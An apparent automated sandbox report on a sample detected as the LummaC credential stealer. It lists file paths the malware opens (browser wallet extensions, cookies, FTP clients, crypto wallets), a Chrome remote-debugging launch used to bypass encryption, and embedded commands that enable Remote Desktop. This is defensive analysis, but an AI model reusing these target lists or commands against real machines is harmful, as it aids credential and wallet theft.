Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
OS version to string mapping found (often used in BOTs)
Source: Af3hqfTjFh.exe Binary or memory string: WIN_81
Source: Af3hqfTjFh.exe Binary or memory string: WIN_XP
Source: Af3hqfTjFh.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Af3hqfTjFh.exe Binary or memory string: WIN_XPe
Source: Af3hqfTjFh.exe Binary or memory string: WIN_VISTA
Source: Af3hqfTjFh.exe Binary or memory string: WIN_7
Source: Af3hqfTjFh.exe Binary or memory string: WIN_8
Searches for user specific document files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Yara detected LummaC Stealer
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.1569736725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Contains functionality to start a terminal service
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000003.916472525.00000000052A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000003.916472525.00000000052A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996423786.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996423786.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000003.955918275.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000003.955918275.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS 